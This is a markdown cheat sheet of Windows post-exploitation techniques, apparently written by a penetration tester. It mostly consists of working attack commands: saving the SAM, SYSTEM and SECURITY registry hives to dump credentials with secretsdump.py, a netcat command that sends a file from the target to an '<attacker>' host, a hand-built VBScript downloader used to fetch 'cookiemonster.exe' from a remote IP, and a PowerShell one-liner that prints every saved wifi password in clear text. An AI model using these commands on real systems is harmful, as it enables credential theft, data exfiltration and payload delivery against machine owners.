# Exfiltration techniques good for windows.

## Grabbing the registry.

If you can't get mimikatz or fgdump to work, exfil the registry itself and do it on your own machine

```
reg save hklm\sam .\sam
reg save hklm\system .\system
reg save hklm\security .\security
```

and then use secretsdump.py  (https://github.com/SecureAuthCorp/impacket/blob/master/examples/secretsdump.py)

`secretsdump.py -sam sam.save -security security.save -system system.save LOCAL`

Source: https://pure.security/dumping-windows-credentials/

## Netcat File Transfer

Tedious, but sometimes tedious is all you got.

Important note:

the `-w` argument is your timeout, in seconds. This can be useful for troubleshooting, but if you're moving a lot of files, bring this down to 10 or something.

On target machine.

`nc.exe <attacker> <port> < file -w 30`

On your machine.

`nc -nlvp 443 > file`

## Handmade wget

Sometimes there's no wget, especially on older windows boxes.

```
echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http,varByteArray,strData,strBuffer,lngCounter,fs,ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
echo http.Open "GET",strURL,False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile,True) >> wget.vbs
echo strData = "" >> wget.vbs
echo strBuffer = "" >> wget.vbs
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1,1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >> wget.vbs
```

Use with:

`cscript wget.vbs http://192.168.1.1/cookiemonster.exe cookiemonster.exe`


## Dump wifi passwords

Handy one liner. I use this often just to figure out what my own wifi password is.  Your windows install has a permanent memory for wifi passwords so it'll print out connections you made years ago.

```
(netsh wlan show profiles) | Select-String "\:(.+)$" | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | % {(netsh wlan show profile name="$name" key=clear)} | Select-String "Key Content\W+\:(.+)$" | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{ SSID=$name;PASSWORD=$pass }} | Format-Table -AutoSize
```


